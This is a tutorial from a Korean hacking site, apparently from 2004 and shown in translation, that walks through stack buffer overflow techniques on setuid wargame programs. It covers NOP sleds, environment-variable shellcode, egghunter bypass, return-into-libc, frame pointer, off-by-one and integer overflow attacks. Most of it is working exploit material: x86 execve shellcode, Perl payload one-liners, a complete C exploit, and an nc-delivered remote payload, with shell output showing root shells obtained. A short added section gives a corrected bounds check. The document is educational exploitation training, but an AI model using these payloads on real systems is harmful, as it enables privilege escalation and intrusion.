http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=212
/*
homepage: http://beist.org
e-mail: beist@hanmail.net
msn: beist@hotmail.com
Sites related to beist:
http://wowhacker.com (wowcode at wowhacker team)
http://hackerschool.org (very good hacking portal site)
*/
- Contents -
0. Introduction
1. big buffer overflow
2. small buffer overflow
3. Various techniques
3-1. egghunter
3-2. argv[0] strcpy
3-3. strcat
4. env overflow
5. lamagra version #1
6. lamagra version #2
7. frame pointer
8. integer overflow
9. Other overflow methods (closing remarks)
On Overflow Attack Techniques..
0. Introduction
Hello, this is beist.
Today we will look at overflows. This document explains stack overflow
techniques; its purpose is to gather both the older stack overflow methods
and the current ones into one write-up.
I will not go into the background knowledge that overflow attacks require,
such as how to write shellcode or how the heap, stack and data segments are
laid out in memory. Covering that would make the document far too long, and
there are already many documents dedicated to those topics. To read and
understand this document you therefore need some prior knowledge of overflow
attack techniques.
A long time has passed since overflow attacks were first published on the
Internet, and many variations have appeared since. To make each technique easy
to follow, I will build a wargame problem for each one and explain it with
that. I will not dump what sits in each memory region; please do that
yourself. Here I only explain the conceptual approach to solving each problem.
Some of the techniques described here apply unchanged to remote targets, but
for ease of explanation everything was tested in a local environment.
1. Basic Stack Overflow (big buffer)
/* 1.c */
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[400];
    if (argc == 2)
        strcpy(buf, argv[1]);   /* unbounded copy: the overflow described below */
    return 0;
}
strcpy() copies argv[1] into buf without any bounds check, so the buffer
overflows.
Let us look at how the attack is laid out. The memory layout is buf - sfp -
ret, and argv[1] is copied into buf.
To raise the odds of success we place NOP (no operation) bytes first, then the
shellcode, then garbage padding, and finally the return address. The sizes are:
NOP - 352
SHELLCODE - 32
GARBAGE - 16
RETURN ADDRESS - 24
char shellcode[]=
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
[root@hacking doc]# gcc -o 1 1.c
[root@hacking doc]# chmod 6755 1
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf4\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf5\xff\xbf"x6'`
Segmentation fault
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf6\xff\xbf"x6'`
Illegal instruction
[beist@hacking doc]$ ./1 `perl -e 'print "\x90"x352, "\x31\xc0\x89\xc3\xb0\x17\x
cd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\x
e1\x8d\x42\x0b\xcd\x80", "a"x16, "\x24\xf7\xff\xbf"x6'`
sh-2.05b#
A shell dropped at 0xbffff724. That address lands somewhere in the NOP sled
inside buf; dump buf yourself to see the exact regions.
2. Basic stack overflow (small buffer)
/* 2.c */
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[4];
    if (argc == 2)
        strcpy(buf, argv[1]);   /* same unbounded copy, into a 4-byte buffer */
    return 0;
}
This is the same source as 1.c, but the size of buf differs. In 1.c buf was
400 bytes, which was plenty of room for the NOPs and shellcode; in 2.c buf is
only 4 bytes, so neither NOPs nor shellcode fit in it.
In that case the attack can use an environment variable. Environment variables
live on the stack: pick any one, put the shellcode in it, and when attacking
2.c use the address of that variable as the return address to get a shell.
[root@hacking doc]# gcc -o 2 2.c
[root@hacking doc]# chmod 6755 2
I will put 400 bytes of NOPs into an environment variable named BEIST,
followed by the shellcode.
[beist@hacking doc]$ BEIST="`perl -e 'print \"\x90\"x400, \"\x31\xc0\x89\xc3\xb0
\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\x8d\x42\x0b\xcd\x80\"'`"
[beist@hacking doc]$ export BEIST
Let us try the attack.
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf8\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xf9\xff\xbf"x3'`
Illegal instruction
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfa\xff\xbf"x3'`
Segmentation fault
[beist@hacking doc]$ ./2 `perl -e 'print "\x24\xfb\xff\xbf"x3'`
sh-2.05b# exit
We got a shell at 0xbffffb24. The BEIST variable sits around that address, and
the spot we landed on is presumably the NOP region inside it.
3. Various overflow variants
The basic method in section (3) is similar to what sections (1) and (2)
described. I will turn several situations into wargame problems and explain
how to solve each.
1) egghunter
This time we attack a vulnerable program that contains an egg hunter. An egg
hunter removes the egg shell, that is, the environment variables. The
environment is declared globally as environ, and the program wipes that
global environ with memset().
So even if we put shellcode in an environment variable and point the
vulnerable function's return address at it, the egg hunter has already zeroed
the environment, and the environment variables cannot be used.
If the vulnerable program's input buffer is large enough, the shellcode could
go in the buffer itself; when it is not, we need some region that is neither
the environment nor the buffer. Here we solve the problem with argv, which,
like the environment, is part of the stack. The problem is as follows.
/* 3-1.c */
#include <string.h>

extern char **environ;

void function(char *str)
{
    char buf[4];
    strncpy(buf, str, 12);   /* copies 12 bytes into a 4-byte buffer */
}

int main(int argc, char *argv[])
{
    int egghunter;
    /* the "egg hunter": zero every environment string before the copy */
    for (egghunter = 0; environ[egghunter]; egghunter++)
        memset(environ[egghunter], 0, strlen(environ[egghunter]));
    function(argv[1]);
    return 0;
}
Let us install the problem and attack it.
[root@beist doc]# gcc -o 3-1 3-1.c
[root@beist doc]# chmod 6755 3-1
When attacking, argv[1] must hold the return address we want to jump to. Our
shellcode will sit in the argv[2] region, so argv[1] must point at argv[2].
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf8\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xf9\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfa\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction
[beist@beist doc]$ ./3-1 `perl -e 'print "\x24\xfb\xff\xbf"x3'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#
We got a shell at 0xbffffb24. argv[2] held 400 bytes of NOPs followed by the
shellcode.
2) argv[0] strcpy
Next is a problem with the same principle but a slightly different solution:
a program that strcpy()s argv[0] itself into a buffer. It is no different from
the basic overflow problem, except that what matters is how argv[0] is
changed. argv[0] is the program name. It can be manipulated in several ways:
a hard link, a symbolic link, or the exec family of functions. Here I use the
simplest one, a symbolic link.
/* 3-2.c */
#include <string.h>

int main(int argc, char *argv[])
{
    char buf[10];
    strcpy(buf, argv[0]);   /* the program name itself overflows buf */
    return 0;
}
Let us install the problem.
[root@beist doc]# gcc -o 3-2 3-2.c
[root@beist doc]# chmod 6755 3-2
We change argv[0] with a symbolic link. Here argv[0] holds only the return
address and the shellcode goes in argv[1], so argv[0] just needs to point at
argv[1].
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xf9\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xf9\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Illegal instruction
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfa\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfa\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@beist doc]$ ln -s ./3-2 `perl -e 'print "\x24\xfb\xff\xbf"x10'`
[beist@beist doc]$ .///`perl -e 'print "\x24\xfb\xff\xbf"x10'` `perl -e 'print
"\x90"x400, "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73
\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05#
Since the return address that worked was 0xbffffb24, we know that argv[1],
which holds the shellcode, is that region. The program is run with ".///"
instead of "./" in front so that the name stays aligned to 4-byte words.
3) strcat overflow
A strcat overflow is no different from any other ordinary overflow: the attack
overwrites the function's return address in exactly the same way.
/* 3-3.c */
#include <string.h>

void function(char *str)
{
    char buf[4] = {0};
    strcat(buf, str);       /* appends past the end of the 4-byte buffer */
}

int main(int argc, char *argv[])
{
    if (argc == 2)
        function(argv[1]);
    return 0;
}
[root@hacking doc]# gcc -o 3-3 3-3.c
[root@hacking doc]# chmod 6755 3-3
The buffer layout of the 3-3 program is:
[ buf ] [ sfp ] [ ret ] [ other region ]
Here we put the NOPs and shellcode in the region after ret and make ret point
into that region.
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf5\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf6\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf7\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
Segmentation fault
[beist@hacking doc]$ ./3-3 `perl -e 'print "\x44\xf8\xff\xbf"x3, "\x90"x500,
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'`
sh-2.05b#
The fourth attempt gave us a shell.
4. env overflow
The env overflow technique was introduced by a foreign hacker,
murat@underunix.org. It approaches the problem a little differently from the
usual stack overflow: where the usual techniques reach our shellcode only
after a number of attempts, env overflow does not rely on a NOP sled and on
guessing the offset, and so it can succeed in one shot.
The core of the env overflow attack is as follows. For more detail, see the
article "Buffer overflow Demystified" on the wowhacker lecture board.
When the program runs, our stack looks like this:
0xbfffffff - top of the stack
4 byte - (NULL byte)
strlen(program name) - length of program_name
1 byte - NUL byte of program_name
strlen(environment variable) - the last environment string
So the position of envp is:
envp = 0xbffffffa - strlen(program_name) - strlen(envp)
By this calculation, if we place the shellcode in envp, fill the vulnerable
program's buffer with the address where envp starts, and overwrite the return
address with it, we get a shell.
If other environment variables exist at attack time, computing the address
becomes a little awkward, so we write a C program that clears all other
environment variables first and then attempts the attack.
The vulnerable wargame source is:
/bof/doc/4.c
#include <string.h>

void function(char *str)
{
    char buf[4];
    strncpy(buf, str, 20);  /* 20 bytes into a 4-byte buffer */
}

int main(int argc, char *argv[])
{
    if (argc == 2)
        function(argv[1]);
    return 0;
}
[root@hacking doc]# gcc -o 4 4.c
[root@hacking doc]# chmod 6755 4
The vulnerable program's buffer is:
[ buf ] [ sfp ] [ ret ]
We will make ret point at the envp address where the shellcode is placed. That
requires passing 12 bytes as argv[1], enough to cover buf, sfp and ret.
The attack source follows.
/bof/doc/4-attack.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

char sc[] =
"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

int main(void)
{
    char *env[3] = {sc, NULL};   /* the shellcode is the only environment string */
    char buf[12];
    int *a = (int *)buf;
    /* envp address from the formula above: 0xbffffffa - strlen(sc) - strlen(program name) */
    int ret = 0xbffffffa - strlen(sc) - strlen("/bof/doc/4");
    *a++ = ret;                  /* buf */
    *a++ = ret;                  /* sfp */
    *a++ = ret;                  /* ret */
    execle("/bof/doc/4", "4", buf, NULL, env);
    return 0;
}
In this case ret is computed as 0xbfffffd0, buf is filled with 0xbfffffd0 to
12 bytes or more, and execle() passes buf as argv[1]. The return address of
/bof/doc/4 then becomes 0xbfffffd0, which is where the shellcode lies, so we
get a shell.
[beist@hacking doc]$ gcc -o 4-attack 4-attack.c
[beist@hacking doc]$ ./4-attack
sh-2.05b# id
uid=0(root) gid=500(beist) groups=500(beist)
We obtained a root shell. The env overflow method has the advantage of getting
a root shell in a single try, but because it relies on environment variables
it can only be used locally. Also, if the environment can be used at all there
are many easier ways than env overflow, so personally I think the technique
has no great merit. Still, it is worth knowing that this approach exists, and
better techniques may grow out of it.
5. lamagra version #1
Anyone interested in overflows will have heard of The Omega Project. It is an
overflow technique made known by a foreign hacker called lamagra; briefly, it
uses return-into-library.
Binaries on a system mostly use code from shared libraries. The advantage is
that by jumping to the memory where a shared library is mapped you can perform
the function you want without injecting machine code of your own.
See The Omega Project document for the full technique; in part 1 I turn the
method from the Omega document into a wargame and solve it.
/* 5.c */
#include <string.h>

void function(char *str)
{
    char buf[4];
    strcpy(buf, str);       /* unbounded copy into a 4-byte buffer */
}

int main(int argc, char *argv[])
{
    if (argc == 2)
        function(argv[1]);
    return 0;
}
[root@hacking doc]# gcc -o 5 5.c
[root@hacking doc]# chmod 6755 5
We run the system() function of the mapped shared library, and turn the
garbage that it tries to execute into a file name to get a shell.
[beist@hacking doc]$ gdb 5
(gdb) b main
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /bof/doc/5
Breakpoint 1, 0x08048348 in main ()
(gdb) x/i system
0x42041e50 <system>: push %ebp
(gdb) quit
The address of system is 0x42041e50.
[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'`
sh: line 1: ä¡B?@€? command not found
Illegal instruction
system() was executed, but because of the odd string it reports "command not
found".
[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'` 2> err
Illegal instruction
The error message was redirected into the file err.
[beist@hacking doc]$ cat err|awk -F ':' '{print $3}'|awk -F ' ' '{print $1}' > ok
[beist@hacking doc]$ cat ok
ä¡B?@€?
Using awk we extracted just the garbage characters from the error message into
the file ok. With that garbage string we create a symbolic link pointing to
/bin/sh.
[beist@hacking doc]$ ln -s /bin/sh `cat ok`
[beist@hacking doc]$ ls -al
합계 80
drwxrwxrwx 2 beist beist 4096 2월 4 04:41 .
drwxrwxrwx 3 root root 4096 2월 3 07:51 ..
-rwsr-sr-x 1 root root 11399 2월 4 04:29 5
-rw-r--r-- 1 root root 132 2월 4 04:28 5.c
-rw-rw-r-- 1 beist beist 42 2월 4 04:34 err
-rw-rw-r-- 1 beist beist 11 2월 4 04:38 ok
lrwxrwxrwx 1 beist beist 7 2월 4 04:41 ä¡?B?+?@?? -> /bin/sh
The symbolic link was created. Now we add ".", meaning the current directory,
to the PATH environment variable.
[beist@hacking doc]$ PATH=.:$PATH
[beist@hacking doc]$ export PATH
Let us try the attack.
[beist@hacking doc]$ ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13372 pts/0 00:00:00 ps
[beist@hacking doc]$ ./5 `perl -e 'print "aaaabbbb","\x50\x1e\x04\x42"'`
[beist@hacking doc]# ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13375 pts/0 00:00:00 ä¡B?@€?
13404 pts/0 00:00:00 ps
After the attack, ps confirms that the symbolic link with the garbage name,
which points to /bin/sh, was executed successfully.
6. lamagra version #2
In part 2 I describe an attack that applies the Omega Project published by
lamagra.
In part 1, when we executed system(), the garbage string got executed. That
garbage is referenced from the following position:
[buf] [sfp] [ret] [dummy] [dummy2]
With ret set to system(), the argument of system() is read from dummy2, at
ret+4; that is, the memory dummy2 points to is used as system()'s argument.
Since we want to run a shell, ret holds the address of system() and dummy2
holds a pointer to /bin/sh. lamagra's article found /bin/sh inside the shared
library; here we use a different way.
This wargame is a remote environment.
We will place a string that can launch a shell in memory and then point dummy2
at it.
There are several ways to get the string we want into memory; a few examples:
1. use argc
2. use argv
3. use environment variables
4. use the program's own buffers
5. other program interpreter tables
The ultimate goal of an overflow is to spawn a shell, and in lamagra's
technique that means finding a string that runs a shell. The string we use
here is the value of the SHELL environment variable. Under bash its value is
"/bin/bash".
[beist@hacking beist]$ echo $SHELL
/bin/bash
We can see "/bin/bash" printed.
Now let us build a wargame problem and solve it properly.
/* 6.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *str)
{
    char buf[4];
    strncpy(buf, str, 20);  /* 20 bytes into a 4-byte buffer */
    memset(buf, 0, 8);      /* clears buf and sfp */
    memset(buf+12, 0, 4);   /* clears dummy */
    /* buf[19] is the top byte of dummy2: block pointers into the shared
       libraries (0x40..0x42) or the binary itself (0x08) */
    if (buf[19]=='\x40' || buf[19]=='\x41' || buf[19]=='\x42' || buf[19]=='\x08')
    {
        printf("Error\n");
        exit(-1);
    }
}

int main(int argc, char *argv[])
{
    if (argc == 2)
    {
        if (strlen(argv[1]) <= 20 || strlen(argv[0]) > 3)
            function(argv[1]);
    }
    return 0;
}
As explained above, we solve this problem using the string in an environment
variable. First, to make the problem remote, set it up as follows.
* Registering the wargame problem in xinetd.d so it can be solved remotely *
[beist@hacking wargame]# gcc -o 6 6.c
[beist@hacking wargame]# cat > /etc/xinetd.d/lama2
service lama2
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /wargame/6
log_on_failure += USERID
}
(press Ctrl + D)
[beist@hacking wargame]# echo "lama2 6666/tcp" > /etc/services
[beist@hacking wargame]# /etc/rc.d/init.d/xinetd restart
xinetd Stop OK...
xinetd Start OK...
If the problem registered correctly with the xinetd daemon, connecting to port
6666 of the wargame server brings up the problem. (Note that the ">" in the
echo line above truncates /etc/services; ">>", which appends the entry, is
what you want.)
The current buffer layout of the target program is:
[ buf ] [ sfp ] [ ret ] [dummy] [dummy2]
Since 20 bytes from buf can be overwritten, the region we can reach is buf
through dummy2. The memset() calls clear buf, sfp and dummy, so those cannot be
used; what is actually usable is ret and dummy2.
We need the address of system() and the address of the SHELL environment
variable, which we assume to be:
system = 0x8048424
SHELL = 0xbfffffe2
(Real wargames often print the address of system(); otherwise it has to be
found by brute force.)
[beist@hacking beist]$ (perl -e 'print "aaaabbbb\x24\x84\x04\x08cccc\xe2\xff
\xff\xbf"';cat)|nc target 6666
id;
uid=0(root) gid=0(root)
We obtained a root shell.
7. frame pointer
The frame pointer overflow is a little different from ordinary overflows: only
1 byte can be overflowed. It is also called a second-generation overflow
technique and was introduced in Phrack 55.
When a function finishes, ebp goes into esp, and ret moves esp into eip.
Being able to overflow 1 byte means the last byte of ebp can be altered to
whatever the attacker wants.
The wargame source is:
7.c
void func(char *str)
{
    char buf[4];
    int i;
    for (i = 0; i <= 4; i++)    /* off by one: writes 5 bytes into buf[4] */
        buf[i] = str[i];
}

int main(int argc, char *argv[])
{
    if (argc == 2)
        func(argv[1]);
    return 0;
}
[beist@hacking doc]# gcc -o 7 7.c
[beist@hacking doc]# chmod 6755 7
As the source shows, the buffer is 4 bytes, but the wrong for-loop bound lets
5 bytes into it, so the last byte of ebp can be overwritten.
Buffer layout:
[ buf ] [ ebp ] [ ret ]
Attack approach.
1. Launch an eggshell.
2. Make buf hold the address of the eggshell.
3. Make the last byte of ebp point at buf.
Here we assume the address of buf is 0xbffff008; in practice find it with a
debugger or dumpcode.
[beist@hacking doc]$ ./egg
Using address: 0xbffff9f8
[beist@hacking doc]$ ./7 `perl -e 'print "\xf8\xf9\xff\xbf\x04"'`
sh-2.05b#
uid=0(root) gid=0(root) groups=500(beist)
We obtained a shell. ebp originally pointed to 0xbffff0xx, and we overwrote its
last byte with \x04. Before being popped, ebp is the 0xbffff004 we set, but the
pop adds 4 to the stack, so it ends up as 0xbffff008. 0xbffff008 holds the
eggshell address 0xbffff9f8, so we got a shell.
ps. With newer gcc versions, if garbage is placed between the buffer and ebp so
that the last byte of ebp cannot be reached, the frame pointer overflow cannot
succeed. If anyone knows how to make the attack succeed even when such garbage
prevents modifying ebp, I would appreciate hearing from you.
8. integer overflow
Integer overflow is a comparatively recently published overflow technique. It
happens when a variable exceeds the range it can hold; if that variable plays
a large role in the program, it can lead to a shell or to other specific
behaviour. For details see Phrack 60, or the article in which I explain it
further.
/* 8.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *str, int count)
{
    char buf[65000];
    strncpy(buf, str, count);   /* count is the untruncated int */
    printf("result : %s\n", buf);
}

int main(int argc, char *argv[])
{
    unsigned short check;
    int auth;
    if (argc != 3)
    {
        printf("EX) %s int string\n", argv[0]);
        return -1;
    }
    auth = atoi(argv[1]);
    check = auth;               /* truncated to 16 bits: 65536 becomes 0 */
    if (check >= 65000)
    {
        printf("check 에 걸렸음\n");   /* "caught by the check" */
        return -1;
    }
    function(argv[2], auth);
    return 0;
}
We attack as follows.
1. Put the shellcode in memory (egg shell).
2. Pass 65536 as argv[1].
3. Pass the eggshell address repeated to 65536 bytes as argv[2].
(An address is 4 bytes, so 4*16384 repetitions give 65536 bytes.)
[beist@beist bof]$ ./egg
Using address: 0xbffffb18
[beist@beist bof]$ ./8 65536 `perl -e 'print "\x18\xfb\xff\xbf"x16384'`
result : ¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿¿û¿û¿û¿û¿
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
.. (omitted) ..
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
sh-2.05#
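As an added example (not from the original document), the length check of 8.c isolated beside a corrected version, so the truncation can be confirmed without running the vulnerable binary; the function names are ours, and bounded_copy is the replacement a fixed 8.c would use instead of strncpy().

```c
/* Added example, not part of the original document: the check from 8.c
 * reproduced in isolation, its corrected form, and a bounded copy. */
#include <stddef.h>
#include <string.h>

#define BUF_SIZE 65000   /* size of buf in 8.c */

/* Mirrors 8.c: auth is narrowed to unsigned short before the compare, so
 * 65536 becomes 0 and passes, while the full int is what reaches strncpy(). */
int vulnerable_check_passes(int auth)
{
    unsigned short check = (unsigned short)auth;   /* 65536 -> 0, 65537 -> 1 */
    return check < BUF_SIZE;                        /* 1 = copy would proceed */
}

/* Corrected: compare the value that will actually be used as the length,
 * and reject negatives, which strncpy() would see as a huge size_t. */
int fixed_check_passes(int auth)
{
    if (auth < 0)
        return 0;
    return (size_t)auth < BUF_SIZE;
}

/* True exactly when 8.c's check lets through a length that strncpy()
 * would then use to write past the 65000-byte buffer. */
int check_is_bypassed(int auth)
{
    return vulnerable_check_passes(auth) && !fixed_check_passes(auth);
}

/* Copy at most `count` bytes of src into dst (dst_size bytes), always
 * NUL-terminate, and return the number of bytes copied, or -1 when the
 * request is rejected (negative count, or no room for the terminator). */
long bounded_copy(char *dst, size_t dst_size, const char *src, int count)
{
    size_t n = 0;
    if (dst_size == 0 || count < 0 || (size_t)count >= dst_size)
        return -1;
    while (n < (size_t)count && src[n] != '\0')
        n++;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (long)n;
}
```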
9. Other overflow methods (closing remarks)
This document does not cover every overflow technique.
Buffer overflow attacks, whatever their individual technique, all share the
need to change the return address. Beyond the methods described above there
are other attack possibilities and techniques.
Besides what was introduced here, my homepage covers other kinds of overflow
solutions; please read those articles too.
Hit : 16813 Date : 2004/07/07 05:18